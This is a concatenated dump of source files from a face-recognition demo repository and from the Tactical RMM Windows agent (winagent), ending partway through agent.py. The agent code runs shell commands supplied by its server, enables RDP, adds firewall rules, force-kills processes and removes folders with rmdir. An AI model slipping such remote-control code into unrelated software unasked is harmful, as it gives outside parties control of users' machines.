"57f69154d254ced1f89179f1a79ee360182b7fe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "no_license", "max_line_length": 120, "num_lines": 6, "path": "/_datmo/README_template.md", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "# [model name] Face Recognition \n\n[model badge]\n[![Datmo Model](http://beta.datmo.io/shabazp/face-recognition/badge.svg)](http://beta.datmo.io/shabazp/face-recognition)\n\n[model description] This repository comprises main tasks required for facial recognition\n" }, { "alpha_fraction": 0.7721205949783325, "alphanum_fraction": 0.7775580883026123, "avg_line_length": 73.9259262084961, "blob_id": "92fbb11572e97f204f12b752ea7322fe08b80de3", "content_id": "85887c17f3b17bd31d8d7743376c31b9be40938b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2023, "license_type": "no_license", "max_line_length": 218, "num_lines": 27, "path": "/README.md", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "# Face Recognition\n\n[![Datmo Model](https://datmo.io/shabazp/datmo-face-recognition/badge.svg)](https://datmo.io/shabazp/datmo-face-recognition)\n\nComputer vision model for facial recognition. This repository comprises main tasks required to be done using facial recognition. For training run, `datmo task run \"python recognition.py\"`\n\n### 1. Face Detection ([detection](https://github.com/Acusense/face-recognition/blob/master/src/detection.py))\n* To find bounding box for faces.\n* To find number of people in any image.\n* Usage: Application can range like Facebook using this to find count of people and detect face to let users tag it.\n\n### 2. Facial Landmark Detection ([landmark_detection](https://github.com/Acusense/face-recognition/blob/master/src/landmark_detection.py))\n\n* To find the face feature locations (eyes, nose, etc) for each face in the image\n* Usage: Application can lie to apply makeup application or is the founding basis to overlay structure as Snapchat does for [lenses](https://support.snapchat.com/en-US/article/lenses1)\n\n### 3. Facial Verification ([verification](https://github.com/Acusense/face-recognition/blob/master/src/verification.py))\n* Given an image of face, we can compare if any new image contains the same person.\n* Usage: Widely used application eg. Uber uses to check if driver is the same person as registered on [app](https://newsroom.uber.com/securityselfies/)\n\n### 4. Facial Recognition ([recognition](https://github.com/Acusense/face-recognition/blob/master/src/recognition.py)/[training](https://github.com/Acusense/face-recognition/blob/master/src/recognition_training.ipynb))\n\n* In a given number of classes does any new image of a face lie in one of the classes.\n* Usage: Application lie to identify any celebrety and also used by Facebook to identify friends in moments or by Google in their Photos app.\n\n\n Built using [dlib](http://blog.dlib.net/2017/02/high-quality-face-recognition-with-deep.html) and [face_recognition](https://github.com/ageitgey/face_recognition)\n" }, { "alpha_fraction": 0.7682926654815674, "alphanum_fraction": 0.7682926654815674, "avg_line_length": 29.875, "blob_id": "996df308b656e78e844c70f5ad68aaed589322a0", "content_id": "be8b4311ca69789da9d24e2431284feccf49dbf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 79, "num_lines": 8, "path": "/detection.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import os\nimport face_recognition\n\nimage_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'test', 'test_image.jpg')\n\nimage = face_recognition.load_image_file(image_path)\nface_locations = face_recognition.face_locations(image)\nprint(face_locations)" }, { "alpha_fraction": 0.615138590335846, "alphanum_fraction": 0.6178038120269775, "avg_line_length": 30.81355857849121, "blob_id": "f9d4e6cfb3755d616f4417d4cb12fe0491d194d5", "content_id": "8bfcb6ca2c69a51917ce2bbdf751ccb14dcf989d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1876, "license_type": "no_license", "max_line_length": 82, "num_lines": 59, "path": "/python_api.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import urllib, cStringIO\nimport scipy \nimport pickle\nimport os\nimport numpy as np\nimport json\nimport face_recognition\nfrom flask import Flask, request, jsonify\n\n\nfilename = os.path.join(os.environ['SNAPSHOT_DIR'],'model.dat')\nclf = pickle.load( open(filename , \"rb\" ) )\nfilename = os.path.join(os.environ['SNAPSHOT_DIR'],'face_names.pkl')\nface_names = np.array(pickle.load(open(filename, 'rb')))\n\ndef add(params):\n return params['a'] + params['b']\n\n\ndef recognition(params):\n \"\"\"\n Loads an image url (.jpg, .png, etc) into a numpy array\n :param url: image url to load\n :return: face recognition over image url\n \"\"\"\n image_file = cStringIO.StringIO(urllib.urlopen(params['url']).read())\n image = scipy.misc.imread(image_file, mode='RGB')\n # read the image file in a numpy array\n list_encoding = face_recognition.face_encodings(image)\n test_pred = []\n test_preds = []\n if list_encoding:\n for encoding in list_encoding:\n test_pred = face_names[clf.predict([encoding])][0]\n test_preds.append(test_pred)\n return list(test_preds)\n\nfunctions_list = [add, recognition]\n\napp = Flask(__name__)\n\[email protected]('/<func_name>', methods=['POST'])\ndef api_root(func_name):\n for function in functions_list:\n if function.__name__ == func_name:\n try:\n json_req_data = request.get_json()\n if json_req_data:\n res = function(json_req_data)\n else:\n return jsonify({\"error\": \"error in receiving the json input\"})\n except Exception as e:\n return jsonify({\"error\": \"error while running the function\"})\n return jsonify({\"result\": res})\n output_string = 'function: %s not found' % func_name\n return jsonify({\"error\": output_string})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')" } ]
7
CrabityGames/winagent
https://github.com/CrabityGames/winagent
4f62ed2a6cbd965729a6bbd6bdb7c287fc29b7d9
14c1bf658b8eaafb160e5c0d4094b2cd580739f3
228b102a3d27e943453fde1593a26fc10d743c5d
refs/heads/master
2022-12-26T22:07:42.637832
2020-10-12T21:01:16
2020-10-12T21:01:16
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7084615230560303, "alphanum_fraction": 0.7423076629638672, "avg_line_length": 46.14814758300781, "blob_id": "e85bafbdf5fef9b9f01bc040481caa6b7a728cea", "content_id": "998af6ab986899a6dd470f92e8dacf5c5d9613f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1300, "license_type": "permissive", "max_line_length": 199, "num_lines": 27, "path": "/README.md", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "## THIS HAS BEEN REPLACED BY THE NEW CROSS-PLATFORM [GOLANG AGENT](https://github.com/wh1te909/rmmagent)\r\n\r\n### Tactical RMM Windows Agent\r\n\r\n[![Build Status](https://travis-ci.com/wh1te909/winagent.svg?branch=master)](https://travis-ci.com/wh1te909/winagent)\r\n[![Build Status](https://dev.azure.com/dcparsi/winagent/_apis/build/status/wh1te909.winagent?branchName=master)](https://dev.azure.com/dcparsi/winagent/_build/latest?definitionId=3&branchName=master)\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\r\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/python/black)\r\n\r\n#### Building (powershell, python 3.8.5)\r\n\r\nDownload and install [Inno Setup](http://jrsoftware.org/isinfo.php)\r\n\r\n```commandline\r\nmkdir 'C:\\Users\\Public\\Documents\\tacticalagent'\r\ncd 'C:\\Users\\Public\\Documents\\tacticalagent'\r\ngit clone https://github.com/wh1te909/winagent.git .\r\npython -m venv env\r\n.\\env\\Scripts\\Activate.ps1\r\npython -m pip install --upgrade pip\r\npip install --upgrade setuptools==49.6.0 wheel==0.35.1\r\npip install --no-cache-dir -r requirements.txt\r\npython .\\env\\Scripts\\pywin32_postinstall.py -install\r\n.\\build.ps1\r\n```\r\n\r\nExe will be in ```C:\\Users\\Public\\Documents\\tacticalagent\\Output```\r\n" }, { "alpha_fraction": 0.4917491674423218, "alphanum_fraction": 0.7161716222763062, "avg_line_length": 16.823530197143555, "blob_id": "71e19cb919c02f93e2c71e3ba535b62beb86f593", "content_id": "08397c3beeeafed8f69cf59dc0dbb27dbb1d864c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 303, "license_type": "permissive", "max_line_length": 52, "num_lines": 17, "path": "/requirements.txt", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "altgraph==0.17\ncertifi==2020.6.20\nchardet==3.0.4\ndecorator==4.4.2\nfuture==0.18.2\nidna==2.10\npeewee==3.13.3\npefile==2019.4.18\npsutil==5.7.2\ngit+git://github.com/pyinstaller/pyinstaller@develop\npywin32==228\npywin32-ctypes==0.2.0\nrequests==2.24.0\nsix==1.15.0\nurllib3==1.25.10\nvalidators==0.18.1\nWMI==1.5.1\n" }, { "alpha_fraction": 0.4142143130302429, "alphanum_fraction": 0.41754579544067383, "avg_line_length": 32.97087478637695, "blob_id": "5c93b411ed23551524b898a99eb81dc4765b0df3", "content_id": "10efc1718f9d54c6796e3b72ec3fa022df3faae4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3602, "license_type": "permissive", "max_line_length": 105, "num_lines": 103, "path": "/winagent/winupdater.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import json\r\nimport subprocess\r\n\r\nimport requests\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\nclass WinUpdater(WindowsAgent):\r\n def __init__(self, log_level, log_to):\r\n super().__init__(log_level, log_to)\r\n self.updater_url = f\"{self.astor.server}/winupdate/winupdater/\"\r\n self.results_url = f\"{self.astor.server}/winupdate/results/\"\r\n self.scan_url = f\"{self.astor.server}/api/v1/triggerpatchscan/\"\r\n self.check_payload = {\"agent_id\": self.astor.agentid}\r\n\r\n def install_update(self, kb):\r\n try:\r\n r = subprocess.run(\r\n [\r\n self.salt_call,\r\n \"win_wua.get\",\r\n f\"{kb}\",\r\n \"download=True\",\r\n \"install=True\",\r\n \"--local\",\r\n ],\r\n capture_output=True,\r\n timeout=7200,\r\n )\r\n ret = r.stdout.decode(\"utf-8\", errors=\"ignore\")\r\n self.logger.debug(ret)\r\n return ret\r\n except Exception as e:\r\n self.logger.debug(e)\r\n\r\n def trigger_patch_scan(self):\r\n try:\r\n payload = {\r\n \"agent_id\": self.astor.agentid,\r\n \"reboot\": self.salt_call_ret_bool(\"win_wua.get_needs_reboot\"),\r\n }\r\n r = requests.patch(\r\n self.scan_url,\r\n data=json.dumps(payload),\r\n headers=self.headers,\r\n timeout=60,\r\n verify=self.verify,\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n\r\n return \"ok\"\r\n\r\n def install_all(self):\r\n try:\r\n resp = requests.get(\r\n self.updater_url,\r\n data=json.dumps(self.check_payload),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n else:\r\n if resp.json() == \"nopatches\":\r\n return False\r\n else:\r\n try:\r\n for patch in resp.json():\r\n kb = patch[\"kb\"]\r\n install = self.install_update(kb)\r\n self.logger.info(install)\r\n res_payload = {\"agent_id\": self.astor.agentid, \"kb\": kb}\r\n status = json.loads(install)\r\n\r\n if (\r\n status[\"local\"][\"Install\"][\"Updates\"]\r\n == \"Nothing to install\"\r\n ):\r\n res_payload.update({\"results\": \"alreadyinstalled\"})\r\n else:\r\n if status[\"local\"][\"Install\"][\"Success\"]:\r\n res_payload.update({\"results\": \"success\"})\r\n else:\r\n res_payload.update({\"results\": \"failed\"})\r\n\r\n requests.patch(\r\n self.results_url,\r\n json.dumps(res_payload),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n\r\n # trigger a patch scan once all updates finish installing, and check if reboot needed\r\n self.trigger_patch_scan()\r\n\r\n except Exception as e:\r\n self.logger.debug(e)\r\n" }, { "alpha_fraction": 0.4782244563102722, "alphanum_fraction": 0.481853723526001, "avg_line_length": 27.887096405029297, "blob_id": "fed6585310073723a1d4935b1d27907c03e33d8e", "content_id": "75a6ebdba2e5ebae676ee134202ac6be6bc38a25", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3582, "license_type": "permissive", "max_line_length": 84, "num_lines": 124, "path": "/winagent/taskrunner.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import asyncio\nimport json\nimport subprocess\nfrom time import perf_counter\n\nimport requests\n\nfrom agent import WindowsAgent\n\n\nclass TaskRunner(WindowsAgent):\n def __init__(self, task_pk, log_level, log_to):\n super().__init__(log_level, log_to)\n self.task_pk = task_pk\n self.task_url = f\"{self.astor.server}/api/v1/{self.task_pk}/taskrunner/\"\n\n def run(self):\n # called manually and not from within a check\n ret = self.get_task()\n if not ret:\n return False\n\n asyncio.run(self.run_task(ret))\n\n async def run_while_in_event_loop(self):\n # called from inside a check\n ret = self.get_task()\n if not ret:\n return False\n\n await asyncio.gather(self.run_task(ret))\n\n def get_task(self):\n try:\n resp = requests.get(\n self.task_url, headers=self.headers, timeout=15, verify=self.verify\n )\n except Exception as e:\n self.logger.debug(e)\n return False\n else:\n return resp.json()\n\n async def run_task(self, data):\n try:\n script_path = data[\"script\"][\"filepath\"]\n shell = data[\"script\"][\"shell\"]\n timeout = data[\"timeout\"]\n script_filename = data[\"script\"][\"filename\"]\n args = []\n\n try:\n args = data[\"script_args\"]\n except KeyError:\n pass\n\n cmd = [\n self.salt_call,\n \"win_agent.run_script\",\n f\"filepath={script_path}\",\n f\"filename={script_filename}\",\n f\"shell={shell}\",\n f\"timeout={timeout}\",\n f\"args={args}\",\n ]\n\n self.logger.debug(cmd)\n start = perf_counter()\n\n proc = await asyncio.create_subprocess_exec(\n *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE\n )\n\n proc_timeout = int(timeout) + 2\n\n try:\n proc_stdout, proc_stderr = await asyncio.wait_for(\n proc.communicate(), proc_timeout\n )\n except asyncio.TimeoutError:\n try:\n proc.terminate()\n except:\n pass\n\n self.logger.debug(f\"Task timed out after {timeout} seconds\")\n proc_stdout, proc_stderr = False, False\n stdout = \"\"\n stderr = f\"Task timed out after {timeout} seconds\"\n retcode = 98\n\n stop = perf_counter()\n\n if proc_stdout:\n resp = json.loads(proc_stdout.decode(\"utf-8\", errors=\"ignore\"))\n retcode = resp[\"local\"][\"retcode\"]\n stdout = resp[\"local\"][\"stdout\"]\n stderr = resp[\"local\"][\"stderr\"]\n\n elif proc_stderr:\n retcode = 99\n stdout = \"\"\n stderr = proc_stderr.decode(\"utf-8\", errors=\"ignore\")\n\n payload = {\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"retcode\": retcode,\n \"execution_time\": \"{:.4f}\".format(stop - start),\n }\n self.logger.debug(payload)\n\n resp = requests.patch(\n self.task_url,\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n )\n\n except Exception as e:\n self.logger.debug(e)\n\n return \"ok\"\n" }, { "alpha_fraction": 0.4376486539840698, "alphanum_fraction": 0.44172611832618713, "avg_line_length": 33.45783233642578, "blob_id": "b504b17153e67ae3ecd3d3a4cceb665a0819f95e", "content_id": "035c5fa5a4d2b2109853386bb12ec9159ec8f56f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2943, "license_type": "permissive", "max_line_length": 84, "num_lines": 83, "path": "/winagent/winagentsvc.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import json\r\nfrom random import randrange\r\nfrom time import sleep\r\n\r\nimport requests\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\nclass WinAgentSvc(WindowsAgent):\r\n def __init__(self, log_level, log_to):\r\n super().__init__(log_level, log_to)\r\n self.hello = f\"{self.astor.server}/api/v2/hello/\"\r\n\r\n def run(self):\r\n self.logger.info(\"Agent service started.\")\r\n try:\r\n info = {\r\n \"agent_id\": self.astor.agentid,\r\n \"hostname\": self.hostname,\r\n \"operating_system\": self.get_os(),\r\n \"total_ram\": self.get_total_ram(),\r\n \"plat\": self.platform,\r\n \"plat_release\": self.get_platform_release(),\r\n \"version\": self.version,\r\n \"antivirus\": self.get_av(),\r\n \"boot_time\": self.get_boot_time(),\r\n }\r\n\r\n salt_ver = self.get_salt_version()\r\n if isinstance(salt_ver, str):\r\n info[\"salt_ver\"] = salt_ver\r\n\r\n self.logger.debug(info)\r\n\r\n r = requests.post(\r\n self.hello,\r\n json.dumps(info),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n\r\n sleep(5)\r\n\r\n while 1:\r\n try:\r\n payload = {\r\n \"agent_id\": self.astor.agentid,\r\n \"local_ip\": self.get_cmd_output([\"ipconfig\", \"/all\"]),\r\n \"services\": self.get_services(),\r\n \"public_ip\": self.get_public_ip(),\r\n \"used_ram\": self.get_used_ram(),\r\n \"disks\": self.get_disks(),\r\n \"logged_in_username\": self.get_logged_on_user(),\r\n \"boot_time\": self.get_boot_time(),\r\n \"version\": self.version,\r\n }\r\n self.logger.debug(payload)\r\n\r\n r = requests.patch(\r\n self.hello,\r\n json.dumps(payload),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n\r\n if isinstance(r.json(), dict) and \"recovery\" in r.json().keys():\r\n if r.json()[\"recovery\"] == \"salt\":\r\n self.spawn_detached_process([self.exe, \"-m\", \"recoversalt\"])\r\n elif r.json()[\"recovery\"] == \"mesh\":\r\n self.spawn_detached_process([self.exe, \"-m\", \"recovermesh\"])\r\n elif r.json()[\"recovery\"] == \"command\":\r\n cmd = r.json()[\"cmd\"]\r\n self.spawn_detached_process(cmd, shell=True)\r\n\r\n except Exception as e:\r\n self.logger.debug(e)\r\n finally:\r\n sleep(randrange(start=30, stop=120))\r\n" }, { "alpha_fraction": 0.48143234848976135, "alphanum_fraction": 0.48972147703170776, "avg_line_length": 27.72381019592285, "blob_id": "c42331e0b6db736597d28798d28833f5ffd1f87f", "content_id": "ada799d259fb89cb9367f7b4815909842b76f447", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3016, "license_type": "permissive", "max_line_length": 88, "num_lines": 105, "path": "/winagent/mesh.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\nimport sys\nfrom time import sleep\n\nimport psutil\n\nfrom agent import WindowsAgent\nfrom utils import kill_proc, remove_dir\n\n\nclass MeshAgent(WindowsAgent):\n def __init__(self, log_level, log_to):\n super().__init__(log_level, log_to)\n self.mesh_svc = \"mesh agent\"\n self.pf = os.environ[\"ProgramFiles\"]\n\n @property\n def mesh_dir(self):\n dir1 = os.path.join(self.pf, \"Mesh Agent\")\n dir2 = os.path.join(self.pf, \"mesh\\\\Mesh Agent\")\n if os.path.exists(dir1):\n return dir1\n elif os.path.exists(dir2):\n return dir2\n else:\n return None\n\n def remove_mesh(self, exe):\n print(\"Found existing Mesh Agent. Removing...\", flush=True)\n try:\n subprocess.run(\n [\"sc\", \"stop\", self.mesh_svc], capture_output=True, timeout=30\n )\n sleep(5)\n except:\n pass\n\n mesh_pids = []\n mesh_procs = [\n p.info\n for p in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in p.info[\"name\"].lower()\n ]\n\n for proc in mesh_procs:\n mesh_pids.append(proc[\"pid\"])\n\n for pid in mesh_pids:\n kill_proc(pid)\n\n try:\n r = subprocess.run([exe, \"-fulluninstall\"], capture_output=True, timeout=60)\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n\n if self.mesh_dir:\n remove_dir(self.mesh_dir)\n\n def install_mesh(self, exe, cmd_timeout):\n attempts = 0\n retries = 5\n\n print(\"Installing mesh agent\", flush=True)\n try:\n ret = subprocess.run(\n [exe, \"-fullinstall\"], capture_output=True, timeout=cmd_timeout\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n return \"error\"\n\n sleep(15)\n while 1:\n try:\n r = subprocess.run([exe, \"-nodeidhex\"], capture_output=True, timeout=30)\n mesh_node_id = r.stdout.decode(\"utf-8\", errors=\"ignore\").strip()\n except Exception as e:\n attempts += 1\n self.logger.error(e)\n self.logger.error(\n f\"Failed to get mesh node id: attempt {attempts} of {retries}\"\n )\n sys.stdout.flush()\n sleep(5)\n else:\n if \"not defined\" in mesh_node_id.lower():\n attempts += 1\n self.logger.error(\n f\"Failed to get mesh node id: attempt {attempts} of {retries}\"\n )\n sys.stdout.flush()\n sleep(5)\n else:\n attempts = 0\n\n if attempts == 0:\n break\n elif attempts >= retries:\n mesh_node_id = \"error\"\n break\n\n return mesh_node_id\n" }, { "alpha_fraction": 0.5692073702812195, "alphanum_fraction": 0.5815446972846985, "avg_line_length": 28.43781089782715, "blob_id": "c6722f6e3f9b4b0a1903a33065c79566884872b6", "content_id": "695177e1018cafcdd88994d925731a50aa12f723", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5917, "license_type": "permissive", "max_line_length": 131, "num_lines": 201, "path": "/winagent/utils.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import ctypes\nimport os\nimport platform\nimport re\nimport signal\nimport subprocess\nimport winreg\nfrom ctypes.wintypes import BYTE, DWORD, WCHAR, WORD\n\nimport psutil\nimport wmi\n\nkernel32 = ctypes.WinDLL(str(\"kernel32\"), use_last_error=True)\n\n\ndef kill_proc(pid):\n try:\n parent = psutil.Process(pid)\n children = parent.children(recursive=True)\n children.append(parent)\n for p in children:\n p.send_signal(signal.SIGTERM)\n\n gone, alive = psutil.wait_procs(children, timeout=20, callback=None)\n except:\n pass\n\n\ndef enable_rdp():\n with winreg.CreateKeyEx(\n winreg.HKEY_LOCAL_MACHINE,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\",\n 0,\n winreg.KEY_ALL_ACCESS,\n ) as key:\n winreg.SetValueEx(key, \"fDenyTSConnections\", 0, winreg.REG_DWORD, 0)\n\n subprocess.run(\n 'netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes',\n capture_output=True,\n shell=True,\n timeout=15,\n )\n\n\ndef disable_sleep_hibernate():\n with winreg.CreateKeyEx(\n winreg.HKEY_LOCAL_MACHINE,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\Power\",\n 0,\n winreg.KEY_ALL_ACCESS,\n ) as key:\n winreg.SetValueEx(key, \"HiberbootEnabled\", 0, winreg.REG_DWORD, 0)\n\n commands = [\n lambda x: f\"powercfg /set{x}valueindex scheme_current sub_buttons lidaction 0\",\n lambda x: f\"powercfg /x -standby-timeout-{x} 0\",\n lambda x: f\"powercfg /x -hibernate-timeout-{x} 0\",\n lambda x: f\"powercfg /x -disk-timeout-{x} 0\",\n lambda x: f\"powercfg /x -monitor-timeout-{x} 0\",\n lambda x: f\"powercfg /x -standby-timeout-{x} 0\",\n ]\n\n for x in [\"ac\", \"dc\"]:\n for i in commands:\n subprocess.run(i(x), capture_output=True, shell=True)\n\n subprocess.run(\"powercfg -S SCHEME_CURRENT\", capture_output=True, shell=True)\n\n\ndef enable_ping():\n subprocess.run(\n 'netsh advfirewall firewall add rule name=\"ICMP Allow incoming V4 echo request\" protocol=icmpv4:8,any dir=in action=allow',\n capture_output=True,\n shell=True,\n )\n\n\ndef remove_dir(folder):\n if os.path.exists(folder):\n try:\n os.system('rmdir /S /Q \"{}\"'.format(folder))\n except:\n pass\n\n\ndef bytes2human(n):\n # http://code.activestate.com/recipes/578019\n symbols = (\"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\", \"Y\")\n prefix = {}\n for i, s in enumerate(symbols):\n prefix[s] = 1 << (i + 1) * 10\n for s in reversed(symbols):\n if n >= prefix[s]:\n value = float(n) / prefix[s]\n return \"%.1f%s\" % (value, s)\n return \"%sB\" % n\n\n\ndef show_version_info():\n program_dir = os.path.join(os.environ[\"ProgramFiles\"], \"TacticalAgent\")\n print(\"Arch\", platform.machine(), flush=True)\n print(\"Program Directory\", program_dir, flush=True)\n ver_file = os.path.join(program_dir, \"VERSION\")\n if os.path.exists(ver_file):\n try:\n with open(ver_file) as f:\n ver = f.read().strip()\n\n print(f\"Agent version: {ver}\", flush=True)\n except Exception as e:\n print(f\"Error getting version: {e}\", flush=True)\n else:\n print(f\"{ver_file} does not exist. Unable to get version\")\n\n\n# source: https://github.com/saltstack/salt/blob/master/salt/grains/core.py\ndef os_version_info_ex():\n class OSVersionInfo(ctypes.Structure):\n _fields_ = (\n (\"dwOSVersionInfoSize\", DWORD),\n (\"dwMajorVersion\", DWORD),\n (\"dwMinorVersion\", DWORD),\n (\"dwBuildNumber\", DWORD),\n (\"dwPlatformId\", DWORD),\n (\"szCSDVersion\", WCHAR * 128),\n )\n\n def __init__(self, *args, **kwds):\n super(OSVersionInfo, self).__init__(*args, **kwds)\n self.dwOSVersionInfoSize = ctypes.sizeof(self)\n kernel32.GetVersionExW(ctypes.byref(self))\n\n class OSVersionInfoEx(OSVersionInfo):\n _fields_ = (\n (\"wServicePackMajor\", WORD),\n (\"wServicePackMinor\", WORD),\n (\"wSuiteMask\", WORD),\n (\"wProductType\", BYTE),\n (\"wReserved\", BYTE),\n )\n\n return OSVersionInfoEx()\n\n\ndef get_os_version_info():\n info = os_version_info_ex()\n c = wmi.WMI()\n c_info = c.Win32_OperatingSystem()[0]\n\n ret = {\n \"MajorVersion\": info.dwMajorVersion,\n \"MinorVersion\": info.dwMinorVersion,\n \"BuildNumber\": info.dwBuildNumber,\n \"PlatformID\": info.dwPlatformId,\n \"ServicePackMajor\": info.wServicePackMajor,\n \"ServicePackMinor\": info.wServicePackMinor,\n \"SuiteMask\": info.wSuiteMask,\n \"ProductType\": info.wProductType,\n \"Caption\": c_info.Caption,\n \"Arch\": c_info.OSArchitecture,\n \"Version\": c_info.Version,\n }\n return ret\n\n\n# source: https://github.com/saltstack/salt/blob/master/salt/grains/core.py\ndef get_windows_os_release_grain(caption, product_type):\n\n version = \"Unknown\"\n release = \"\"\n if \"Server\" in caption:\n for item in caption.split(\" \"):\n\n if re.match(r\"\\d+\", item):\n version = item\n\n if re.match(r\"^R\\d+$\", item):\n release = item\n os_release = f\"{version}Server{release}\"\n else:\n for item in caption.split(\" \"):\n if re.match(r\"^(\\d+(\\.\\d+)?)|Thin|Vista|XP$\", item):\n version = item\n os_release = version\n\n if os_release in [\"Unknown\"]:\n os_release = platform.release()\n server = {\n \"Vista\": \"2008Server\",\n \"7\": \"2008ServerR2\",\n \"8\": \"2012Server\",\n \"8.1\": \"2012ServerR2\",\n \"10\": \"2016Server\",\n }\n\n # (Product Type 1 is Desktop, Everything else is Server)\n if product_type > 1 and os_release in server:\n os_release = server[os_release]\n\n return os_release\n" }, { "alpha_fraction": 0.47401416301727295, "alphanum_fraction": 0.48407045006752014, "avg_line_length": 32.623741149902344, "blob_id": "ed95bab11c1f2f63515702e4bb67686123e3b675", "content_id": "7020436910208903303415c23494391a5cb82bce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46737, "license_type": "permissive", "max_line_length": 118, "num_lines": 1390, "path": "/winagent/agent.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import asyncio\nimport base64\nimport datetime as dt\nimport json\nimport logging\nimport math\nimport os\nimport platform\nimport random\nimport shutil\nimport signal\nimport socket\nimport string\nimport subprocess\nimport sys\nimport zlib\nfrom collections import defaultdict\nfrom time import perf_counter, sleep\n\nimport peewee\nimport psutil\nimport requests\nimport validators\nimport win32con\nimport win32evtlog\nimport win32evtlogutil\nimport winerror\nimport wmi\nfrom playhouse.migrate import SqliteMigrator, migrate\nfrom win32com.client import GetObject\n\nfrom utils import (\n bytes2human,\n get_os_version_info,\n get_windows_os_release_grain,\n kill_proc,\n remove_dir,\n)\n\ndb_path = os.path.join(os.environ[\"ProgramFiles\"], \"TacticalAgent\", \"agentdb.db\")\ndb = peewee.SqliteDatabase(db_path)\n\n\nclass AgentStorage(peewee.Model):\n server = peewee.CharField()\n agentid = peewee.CharField()\n mesh_node_id = peewee.CharField()\n token = peewee.CharField()\n agentpk = peewee.IntegerField()\n salt_master = peewee.CharField()\n salt_id = peewee.CharField()\n cert = peewee.CharField(null=True)\n\n class Meta:\n database = db\n\n\nclass WindowsAgent:\n def __init__(self, log_level=\"INFO\", log_to=\"file\"):\n self.log_level = log_level\n self.log_to = log_to\n self.hostname = socket.gethostname()\n self.platform = platform.system().lower()\n self.arch = \"64\" if platform.machine().endswith(\"64\") else \"32\"\n self.programdir = os.path.join(os.environ[\"ProgramFiles\"], \"TacticalAgent\")\n self.exe = os.path.join(self.programdir, \"tacticalrmm.exe\")\n self.system_drive = os.environ[\"SystemDrive\"]\n self.salt_call = os.path.join(self.system_drive, \"\\\\salt\\\\salt-call.bat\")\n self.verify = None\n self.version = self.get_agent_version()\n self.setup_logging()\n self.load_db()\n\n @property\n def salt_minion_exe(self):\n if self.arch == \"64\":\n return \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup.exe\"\n else:\n return \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup-x86.exe\"\n\n @property\n def salt_installer(self):\n if self.arch == \"64\":\n return \"salt-minion-setup.exe\"\n else:\n return \"salt-minion-setup-x86.exe\"\n\n @property\n def mesh_installer(self):\n if self.arch == \"64\":\n return \"meshagent.exe\"\n else:\n return \"meshagent-x86.exe\"\n\n @property\n def nssm(self):\n if self.arch == \"64\":\n return os.path.join(self.programdir, \"nssm.exe\")\n else:\n return os.path.join(self.programdir, \"nssm-x86.exe\")\n\n def load_db(self):\n if os.path.exists(db_path):\n try:\n self.astor = self.get_db()\n self.verify = self.astor.cert\n except:\n self.logger.info(\"Migrating DB\")\n cert = peewee.CharField(null=True)\n migrator = SqliteMigrator(db)\n 